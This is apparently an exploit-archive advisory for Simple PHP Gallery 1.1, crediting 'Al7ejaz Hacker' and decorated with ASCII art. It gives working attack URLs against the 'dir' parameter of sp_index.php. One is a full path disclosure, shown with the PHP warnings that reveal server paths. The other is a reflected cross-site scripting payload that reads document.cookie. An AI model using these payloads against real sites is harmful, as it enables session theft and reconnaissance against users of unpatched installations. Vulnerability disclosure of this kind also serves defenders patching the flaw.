spg-xss.txt

`+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
+ ;;ii,,:: +  
+ :::: :: ;;tt;;:: +  
+ ;;:: ..,,:: ;;ii,,:: +  
+ ,,,, ii;;,, ii;;:: ;;ii,,:: +  
+ ii:: tt;;,, ..tt;;,,.. ;;ii;;:: +  
+ ii,,:: ttii,, ..ff;;;;:: ;;ii;;:: +  
+ tt;;::..,, tt;;,, ff;;;;ii ;;ii,,:: +  
+ tt;;::;;:: tt;;,,.. jj;;,,.. ;;tt,,:: +  
+ tt;;;;,, tt;;,,.. tt;;;; ;;ii;;:: +  
+ ..::,,;;,, tt;;,,.. tt;;,, ;;ii,,:: +  
+ ..::,,ii;;;;.. tt;;,,.. iiii,,:: ;;ii,,:: +  
+ ::,,ttiijj;;,, tt;;;;.. ;;tt,,:: ;;ii,,:: +  
+ ,,;;ii tt;;,, ii;;,,.. ..jj;;:: ;;ii;;:: +  
+ ;;;;:: tt;;:: tt;;;;.. ff;;:: ;;tt,,.. +  
+ ii;;.. ,,ii;;:: ii;;,,.. jj;;,, ;;ii,,.. +  
+ ,,;;,, ::;;;;;;:: ii;;;;.. tt;;,, ;;ii;;.. +  
+ tt;;:::: ::,,;;jj,,:: tt;;,,.. tt;;,, ;;ii,,.. +  
+ jj;;;;,,,,,,iiiiii;;:: ..tt;;,,:: iiii,, ;;ii,,.. +  
+ ;;ffjjttjjttii ii;;:: ii;;;;;;:: ..jj,, ;;ii;;.. +  
+ ..;;.. ii;;,,:: ,,;;;;jj;;,, ..jj,, ;;ii,,.. +  
+ iiii;;,,::::....::,,,,;;,,jj;;;;,,:: ::,,;;,, ;;ii;; +  
+ ..ff;;;;;;,,,,::,,;;;;;; ttii;;;;,,,,,,,,;;;;:: ;;ii,, +  
+ jjii;;;;;;;;;;;;;;ii.. ..ff;;;;;;;;;;;;;;;; ;;ii,, +  
+ jjjj;;;;ii;;;;tt.. iijj;;;;;;;;;;ii:: ;;ii:: +  
+ iijjjjjjtt;; ;;ffffjjjjtt:: ;;ii +  
+ ;;.. ii;; +  
+ .. +  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
+Credit by : Al7ejaz Hacker +  
+ +  
+Script : Simple PHP Gallery 1.1 +  
+Impact : Cross site scripting & fullpath disclosure +  
+ +  
+ +  
+Fullpath disclosure : +  
+ +  
+http://localhost/sp_index.php?dir=[Somthingwrong] +  
+ +  
+Result +  
+ +  
+ +  
+Warning: opendir(123): failed to open dir: No such file or directory in /var/www/html/gallery/sp_helper_functions.php on line 10 +  
+ +  
+Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/html/gallery/sp_helper_functions.php on line 11 +  
+ +  
+Warning: Invalid argument supplied for foreach() in /var/www/html/gallery/sp_def_vars.php on line 147 +  
+ +  
+ +  
+ +  
+ +  
+Cross Site Scripting +  
+ +  
+ +  
+ +  
+dir variable is not probrely verified and can be used to execute html and javascript code +  
+ +  
+http://localhost/sp_index.php?dir=<script>alert(document.cookie)</script> +  
+ +  
+/Milw0rm +  
+ +  
+ +  
+in subject hot : Cross site scripting & fullpath disclosure ;) +  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
`